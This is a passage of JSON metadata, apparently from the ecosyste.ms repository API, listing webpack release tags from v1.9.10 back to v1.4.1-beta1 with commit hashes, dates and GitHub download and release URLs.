0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosy